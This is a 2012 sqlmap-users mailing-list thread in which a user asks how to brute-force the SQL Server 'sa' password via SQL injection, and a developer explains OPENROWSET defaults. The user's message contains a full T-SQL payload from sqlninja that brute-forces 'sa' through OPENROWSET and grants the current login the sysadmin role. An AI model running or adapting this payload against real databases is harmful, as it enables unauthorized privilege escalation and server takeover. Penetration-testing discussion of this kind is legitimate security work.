I was trying sqlninja.
this is the query it use for bruteforce SA password with 1 character
(numbers and letters).
declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q
nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set
@z='''''' set @p=@p+@z set @q=N'select 1 from
OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
1;exec master.dbo.sp_addsrvrolemember
'''''+system_user+N''''',''''sysadmin'''' '')' exec
master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
but I am receiving this error:
*Could not find stored procedure 'master.dbo.xp_execresultset'.*
it was in the HTTP response. this error is because the "openrowset" is
disable? or is just that the "SA" password is not the correct. (like
"password wrong" error).
there is any way to check if "openrowset" is enable?
thanks.
On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <
bernardo.dam...@gmail.com> wrote:
> Hi Juan,
>
> Microsoft SQL Server has a built-in function called OPENROWSET to
> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
> released a paper demonstrating how to abuse this function to perform a
> DBMS user's password brute-force attack within the MSSQL instance. A
> few years later the attack has been automated in sqlninja[1].
> We have an issue open on GitHub[2] to implement the same DBA password
> brute-force attack. We have the required code in place, see issue
> #34[3] and will soon close the whole thing.
>
> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
> 2005 RTM it is disabled by thereforce, hence either the database
> administrator has manually enabled it, or you won't be able to abuse
> this function to brute-force the 'sa' (DBA) password hash or run
> statements on his behalf.
>
> [1] http://sqlninja.sourceforge.net
> [2] https://github.com/sqlmapproject/sqlmap/issues/31
> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>
> Regards,
> Bernardo
>
>
> On 20 July 2012 12:14, juan molina <j.molina04...@gmail.com> wrote:
> > there is a way for bruteforce the SA password using SQL INJECTION?
> >
> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
> > access to the internet (it has the 1433 port blocked),
> > the current user is a normal user (low privileges User). cannot get SA
> hash
> > password.
> >
> > the question is, is there any tool or code or way to bruteforce the SA
> > password? without direct access to the Sql Server?
> >
> > It is a request for add this functionality to SQLMAP, I don't know if is
> > possible.
> >
> > Thanks.
> >
> >
> ------------------------------------------------------------------------------
> > Live Security Virtual Conference
> > Exclusive live event will cover all the ways today's security and
> > threat landscape has changed and how IT managers can respond. Discussions
> > will include endpoint security, mobile security and the latest in malware
> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > _______________________________________________
> > sqlmap-users mailing list
> > sqlmap-users@lists.sourceforge.net
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
>
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
